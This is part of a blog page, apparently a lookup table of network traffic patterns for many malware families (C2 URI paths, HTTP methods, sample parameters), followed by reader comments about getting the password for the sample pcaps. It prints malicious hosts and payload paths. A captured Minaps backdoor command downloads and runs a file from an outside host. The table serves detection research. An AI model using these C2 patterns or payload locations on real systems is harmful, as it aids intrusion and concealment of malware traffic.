APT | Letsgo / TabMsgSQL | GET | /indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc ode%20=%20'IXLCGIXELZ' |
APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20 from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc |
APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20 (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20 ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54', '2011-06-08%2013:45:54','NMQVPTXFBH') |
APT | Letsgo / TabMsgSQL downloader | GET | /new/iistart.html |
APT | Likseput | GET | /index.html |
APT | Lingbo (?) | POST | /windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM >QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb |
APT | Luckycat - WIMMIE | POST | /count/count.php?m=c&n=[HOSTNAME]_ |
CRIME | Medfos | GET | /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww== |
APT | MiniASP | GET | /device_ |
APT | MiniASP | GET | /record.asp?device_t= |
APT | Miniduke | POST | /index.php |
APT | Mirage | POST | /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow |
APT | Mirage - later var | GET | /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg |
CRIME | Money loader | GET | /get_xml?file_id=25227372 /dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 |
APT | Mongal | GET | /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000 |
APT | Murcy | GET | /150828 |
APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT |
APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX |
APT | Netravler | GET | /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1- |
APT | NfLog | GET | /IElog/TestURL.asp HTTP/1.0 |
APT | NfLog | POST | /NfLog/Nfile.asp |
APT | NTESSESS | GET | /6K8gL8.html |
APT | PNG trojan | GET | /index.htm |
APT | Poison Ivy | GET | 256 bytes of seemingly random data after a successful TCP handshake, then 48 byte “keep-alive” requests |
APT | RedOctober AuthInfo | POST | http://%s:%s%s |
APT | RedOctober Sysinfo | POST | /cgi-bin/nt/sk |
APT | RegSubDat | POST | /5501000000/log |
APT | Sanny / Win32.Daws | POST | /write.php |
APT | Seasalt | GET | /postinfo.html |
APT | Sofacy | POST | /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 |
APT | Sofacy | POST | /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS |
CRIME | Srizbi | GET | /cb_4.exe |
CRIME | Stabuniq | POST | /rssnews.php |
APT | Sykipot / Wyksol | GET | /kys_allowget.asp?namegetkys.kys |
APT | Taidoor | GET | /apzsr.php?id=021793111D309GE67E |
APT | Tarsip Eclipse | GET | /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 |
APT | Tarsip Moon | GET | /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 |
CRIME | Tbot tor | n | |
CRIME | Tinba aka Zusy | POST | /h/index.php |
APT | Vinself | POST | /w880/T19R17Q16/12010L11014 |
CRIME | Vobfus | GET | /XEuPCLrf?e |
APT | WEBC2-Bolid | GET | /firefox.html |
APT | WEBC2-Clover | GET | /Default.asp |
APT | WEBC2-CSON | GET | /Default.aspx?INDEX=<10_random_characters>10_random_characters> |
APT | WEBC2-CSON Response to commands | POST | /Default.aspx?ID=IMNQRSSRXK |
APT | WEBC2-HEAD | GET | / |
APT | WEBC2-Table | GET | /order.htm |
CRIME | Xpaj | POST | /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh |
APT | Xtreme Rat | GET | /1234567890.functions |
APT | Xtreme Rat | GET | /1234567890.functions |
CRIME | Zeus Gameover | GET | /search.php?page=73a07bcb51f4be71 |
CRIME | BitcoinMiner | POST | {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} |
CRIME | Blazebot | IRC | NICK USA|94576 USER vtptdwd 0 0 :USA|94576 |
CRIME | Nurjax Adware | GET | /services/rules.txt?dummy=916 |
CRIME | Tosct | GET | Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV |
CRIME | Nocpos | GET POST | /check/echo /check |
CRIME | OnionDuke | GET | /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg= s/sysinfo_7.php /forum/phpBB3/prx_26.php |
APT | Lagulon (Operation Cleaver) | POST | /contador/server.php /i/server.php /includes/server.php |
APT? | Medusa | POST | %s/bbc_mirror/%s/search?id=%s /CNN_Mirror/EN/%s/search?id=%s |00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00 |
CRIME | Toopu | GET | /toopu.png /%s:1048%s /num3.html /web/get_ad3.asp?type=loadall&machinename= /num3_51la.asp |
CRIME | Twerkin | GET | /classes/functions.php?functionname=online /classes/functions.php?functionname=getupdates /classes/functions.php?functionname=getcommand |
CRIME | TzeeBot / TinyZBot | POST | /checkupdate.asmx |
CRIME | XLS URLDownload ToFileA function for Dridex | GET | /koh/mui.php |
CRIME | Quervar / Induc.C / Dorifel | GET | /js/way.php?00021708&pin=7DF38AD66C78A9C3 /404/way.php?00038F50&pin=7DF38AD66C78A9C3 /test/php/way.php?0002E170&pin=7DF38AD66C78A9C3 /1.php?JXU9WXFG&pin=DEC09603F4CEFD80 |
CRIME | Feidowns downloader / Kilim (?) / Cracktools | GET | yeniadmin.php?os=WindowsXP /yeniadmin.php?os=Windows7&osbit=64&antiv /yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI http://whos.amung.us/pingjs/?k=yenikazi |
CRIME | GameVance Adware | GET | /aj/updtah.php |
CRIME | OpenShopper Adware | GET | //mmsv/Access3.php //opendb/mmsv.php //mmsv/Access2.php /opapp/postmedia1/Update.dat /opapp/postmedia1/OKUpdate.exe |
CRIME | SoftPulse Adware | GET | /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D |
CRIME | FakeAV | GET | /[...]/load.php?file=uploader /[...]/load.php?file=grabbers /[…]/load.php?file=1 /ohwgx3kiTh/document.doc /ohwgx3kiTh/load.php?file=0 |
CRIME | Wauchos (download by Zbot of Cridex) | POST | /ssdc32716372/file.php /auto*.it/*/jeve.exe //dd*.ru/old.exe |
CRIME | Blackenergy DDos Bot | POST | id=[bot_id]&bid=[base64_encoded_build_ id]&dv=[x]&mv=[y]&dpv=[z] id=[bot_id_sha1]&bid=[base64_encoded_build_ id]&nm=[x]&cn=[y]&num=[z] The only major difference is that the id field contain just the hash instead of the actual string |
CRIME | Alurewo / Alureon pay per click | GET | /click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5 |
CRIME | OSX Wirelurker | GET | mac/getversion.php?sn= |
CRIME | Systweak Adware - Systweak RegClean Pro & Advanced System Protector | GET | /getipaddress.asp |
CRIME | MPlug / Multiplug Adware | GET | /?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0& page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd% 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+ -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_ redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo ut_id= 8&project_name=TusFiles&uuid=%252A |
CRIME | Nemucod JS | GET | /document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939 1 |
CRIME | Andromeda / Wauchos | POST | /and/gate.php |
CRIME | Poweliks click-fraud | GET | /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0 |
CRIME | Poweliks click-fraud | GET | /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9 |
CRIME | Yoddos / Darkshell / YoYoDDoS | 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........ | |
APT | Cobra / Turla | POST | /%s/%s? uid=%d&context=%s&mode=text&data=%s |
APT | Panda | POST | /forum/login.cgi |
APT | Panda | POST | /Photos/Query.cgi?loginid= |
APT | Aided Frame | GET | /img/js.php |
APT | Scanbox Watering hole framework | POST | /i/recv.php |
CRIME | Blackenergy DDos Bot | GET | /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php |
APT | Syria Twitter. apk | POST | /contacts |
APT | TinyBaron / Miniduke / CosmicDuke | GET | /modules/db/mgr.php? /modules/db/mgr.php?F=3? |
CRIME? | Moure | GET | /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM= /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k |
CRIME | Vundo | GET | /webhp /wpad.dat |
CRIME / APT | Lostdoor RAT | INFO||LostDoor-001|Remote PC|| Windows XP Professional| | |
APT | Protux worm | POST | " http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 http://202.71.136.14:80/ggBwkFNqDu1869.avi /newTroy.jpg" /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3 |
CRIME | Conficker / Kido worm | GET | / ip checking services |
CRIME | Dingu / Proxy | GET | /1.jpg http://webemail.bounceme.net:8080/directget42.gif |
CRIME | Dyre | GET | /1/manualec.pdf |
CRIME | Zeus | GET | /ycJ2Jj7r4t3wc6y4/ali.jpg |
CRIME | Cryptowall | POST | /tpnofu223t8h8dl |
CRIME | Cryptowall | POST | /4175iq691v3l GET /raw |
CRIME | Galapoper / Tibs Downloader | GET | /pic/tool.jpg /pic/search.jpg /pic/tibs.jpg /pic/proxy.jpg /pic/winlogon.jpg |
APT | Wykcores | GET | /279843 /279859 /280015 /287171 /315171 /110937 /111968 /113000 /114031 /115062 |
ADV | Ads - Zenovia Digital Exchange (not necessarily malicious) | GET | /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs |
CRIME | EsFury worm | GET | http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT |
CRIME | PornoAsset / LockEmAll Ransomware | GET | /a.php?f=647&e=2 |
CRIME | FakeAV Privacy Center | GET | /dfgsdfsdf.php /mf.php /css/new-mobile.css /js/wsjs.js /js/caf.js |
CRIME | Zeus V2 (drop zone, config) | GET / POST | /panel3/gotobank.php /panel3/ppnl3.exe /panel3/ppnl3.bin /ppnl3.bin |
CRIME | Blathla / Cadro adware | GET | /1.gif |
CRIME | Vundo / Krap | POST | / |
CRIME | Vundo / Krap | POST | /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA |
CRIME | VOlk bot | GET | /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1 User-Agent: vb wininet Host: portalcinemark.us |
CRIME | Oficla / Sasfis | GET | /21/download.php?expid=0&fid=1 /s/download.php?expid=4&fid=1 /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3 /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3 /np/load.php?spl=hcp&b=ff&o=xp&i=hcp /phpbb/image2/cp.php?i=15 |
APT | Pingbed | GET | /default.htm /default1.htm /default2.htm |
APT | Minaps backdoor | GET / POST | /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko /download/logo.png /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi |
CRIME | QHost / Orsam / Bicololo | GET | /stat/tuk/183 |
This is exceptionally valuable to the community. Thanks for doing this.
ReplyDeletePerfect idea!
ReplyDeleteDo you have the intend to publish a kind of mailing list that inform us when your database is added?
How you do when requests are crypted or GET/POST on other port than 80 ?
Thanks
HI there, no we plan it to be low maintenance - see pattern = add. Need to reference = visit the link. People have enough spam in their mailboxes and no easy way for us to deal with the mailings.
DeleteSome of these are on port 443 and other.
We might add port column but also see the links with publications - they show and explain much more than the table, which is just a lookup reference. thank you
Absolutely Spectacular!
ReplyDeleteAwesome stuff, seriously! Mila and Andre' - keep up the fantastic work!!!
ReplyDeleteGood stuff. Keep up the great work!!
ReplyDeleteThank you for the good feedback!
ReplyDeleteThe fact is that Malsubjects will continue to cause havoc in cyberspace using everything they have in their power. It is time that we all realize that we are fighting a cyberwar where in many cases the malsubjects are winning many of these battles. It’s about time we defend ourselves with ALL we’ve got!
ReplyDeleteI may have over looked it, but is the password for the newly downloadable pcaps posted anywhere?
ReplyDeleteThanks,
you don't need a pass to download the spreadsheet itself - go to File - Save AS (might need to use gmail acct, not sure) but for the malware and pcap downloads - it is the same scheme as on Contagiodump.blogspot.com - please email Mila for the pass scheme (click on the name above in the post and replace (at) with @
DeleteVery useful, it's rare to find resources this good on APT
ReplyDeleteit's best pleasure to share the malware-pcap files for public. i have emailed you for the password. wish remail soon. thank you very much. thos pcap files will help me to get further study on the APT research.
ReplyDeleteAmazing resource! Thank you so much.
ReplyDeleteThis is amazing, thank you.
ReplyDeleteThank you so much for taking the time to share this information. A great read. I’ll certainly be back
ReplyDelete